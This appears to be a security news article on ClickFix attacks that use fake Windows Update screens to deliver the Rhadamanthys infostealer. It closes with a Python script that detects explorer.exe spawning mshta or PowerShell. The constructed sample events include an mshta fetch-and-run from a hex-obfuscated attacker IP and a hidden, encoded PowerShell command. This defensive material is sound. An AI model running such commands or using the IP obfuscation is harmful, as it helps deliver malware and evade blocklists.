Recent ClickFix attacks that use counterfeit Windows Update screens are tricking users into installing infostealer malware. The lure is a full-screen blue Windows Update page urging a "critical security update"; the victim is told to apply it by opening the Run dialog (Win+R) and executing a command supplied by the page.
Methodology and Deception
The command starts a multi-stage chain. mshta.exe is launched with a URL in which the second octet of the server's IP address is written in hexadecimal, an obfuscation that standard resolvers still accept but that defeats naive string matching on the dotted-decimal address. The content mshta retrieves launches PowerShell, which decrypts and loads a .NET assembly. That assembly is a steganographic loader: it extracts shellcode hidden in PNG images and ultimately runs the Rhadamanthys infostealer, which harvests login credentials.
- Mshta.exe launches first, fetching a URL whose IP address carries a hex-encoded second octet.
- PowerShell decrypts and loads a .NET assembly.
- Steganographic loader extracts Donut-packed shellcode from PNGs.
- Rhadamanthys infostealer is deployed to steal credentials.
Investigations and Regional Impact
According to Huntress, 76 incidents were analyzed between 2025-09-29 and 2025-10-30, affecting organizations across the U.S., EMEA and APJ regions. At least one IP address involved is 141.98.80[.]175 (defanged).
The lure site for the Windows Update scam contained comments written in Russian. Although law enforcement takedowns under Operation Endgame began on 2025-11-13, several domains associated with these attacks were still active as of 2025-11-19.
Defense Strategies and Recommendations
To counter such scams, experts suggest disabling the Windows Run box (for example through the Explorer "Remove Run menu from Start Menu" policy, which also disables the Win+R shortcut) and educating staff that a legitimate CAPTCHA or Windows Update never requires them to run a command. Endpoint detection and response tooling is critical for catching the telltale process tree: explorer.exe, the parent of anything launched from the Run box, spawning mshta.exe, powershell.exe or similar binaries with unusual command lines.
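As an added example (not Huntress's code and not part of the original article), the Python sketch below implements the detection logic recommended above and undoes the IP-obfuscation trick from the attack chain. It scans constructed Sysmon-style process-creation records for explorer.exe spawning a living-off-the-land binary, decodes mixed-notation IPv4 literals back to dotted decimal (handling hex, octal and decimal octets, which goes beyond the single hex octet mentioned in the text), and flags hidden-window and encoded-command switches. The sample events, the `/update` path and the encoded-command fragment are constructed; the literal `141.0x62.80.175` is a reconstruction of how the reported IP would look with its second octet written in hex.

```python
import re

# Children a "Windows Update" has no business launching from an interactive shell.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                       "curl.exe", "certutil.exe", "msiexec.exe", "rundll32.exe"}
# A command typed into the Run box (Win+R) is a child of explorer.exe.
RUN_BOX_PARENTS = {"explorer.exe"}

# Dotted IPv4 literal whose octets may be decimal, octal (leading 0) or hex (0x..).
OCTET = r"(?:0x[0-9a-f]+|\d+)"
IPV4_LITERAL = re.compile(rf"(?<![\w.]){OCTET}(?:\.{OCTET}){{3}}(?![\w.])", re.I)
# PowerShell switches typical of ClickFix one-liners.
STEALTH_SWITCHES = re.compile(
    r"(?:^|\s)-(?:w|windowstyle)\s+hidden\b|(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)


def parse_octet(tok: str):
    """Decode one octet the way inet_addr does: 0x.. is hex, a leading 0 is octal, else decimal."""
    try:
        if tok.lower().startswith("0x"):
            value = int(tok[2:], 16)
        elif len(tok) > 1 and tok[0] == "0":
            value = int(tok, 8)          # "0142" -> 98; "080" is invalid octal and raises
        else:
            value = int(tok, 10)
    except ValueError:
        return None
    return value if 0 <= value <= 255 else None


def normalize_ipv4(literal: str):
    """Return the plain dotted-decimal form of a (possibly obfuscated) IPv4 literal, or None."""
    octets = [parse_octet(t) for t in literal.split(".")]
    if len(octets) != 4 or None in octets:
        return None
    return ".".join(map(str, octets))


def obfuscated_ips(command_line: str):
    """(as_written, canonical) pairs for IPv4 literals that are not already plain dotted decimal."""
    found = []
    for m in IPV4_LITERAL.finditer(command_line):
        canonical = normalize_ipv4(m.group(0))
        if canonical is not None and canonical != m.group(0):
            found.append((m.group(0), canonical))
    return found


def triage(events):
    """Flag Run-box style launches: explorer.exe -> LOLBin, with the lure's URL and switch tricks."""
    findings = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        child = ev["Image"].rsplit("\\", 1)[-1].lower()
        if parent not in RUN_BOX_PARENTS or child not in SUSPICIOUS_CHILDREN:
            continue
        cmd = ev["CommandLine"]
        reasons = [f"{parent} spawned {child}"]
        ips = obfuscated_ips(cmd)
        if ips:
            reasons.append("obfuscated IPv4 literal: " +
                           ", ".join(f"{seen} -> {real}" for seen, real in ips))
        if STEALTH_SWITCHES.search(cmd):
            reasons.append("hidden window / encoded command switches")
        if re.search(r"https?://", cmd, re.I):
            reasons.append("remote URL on command line")
        findings.append({"pid": ev["ProcessId"], "child": child,
                         "ips": [real for _, real in ips], "reasons": reasons})
    return findings


# Constructed Sysmon-style Event ID 1 records (not real telemetry). The /update path and the
# encoded-command fragment are hypothetical; the hex-octet URL reconstructs the reported trick.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://141.0x62.80.175/update"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'},
    {"ProcessId": 4302, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"},
    {"ProcessId": 4410, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["pid"], finding["child"], "|", "; ".join(finding["reasons"]))
```

Only the two explorer.exe-parented launches (PIDs 4120 and 4410) are flagged; the scheduled-task style powershell.exe under svchost.exe is deliberately out of scope for this rule and needs its own baseline. The IP normalization is worth keeping as a separate enrichment step, because blocklists and URL filters that match on `141.98.80.175` will silently miss `141.0x62.80.175`.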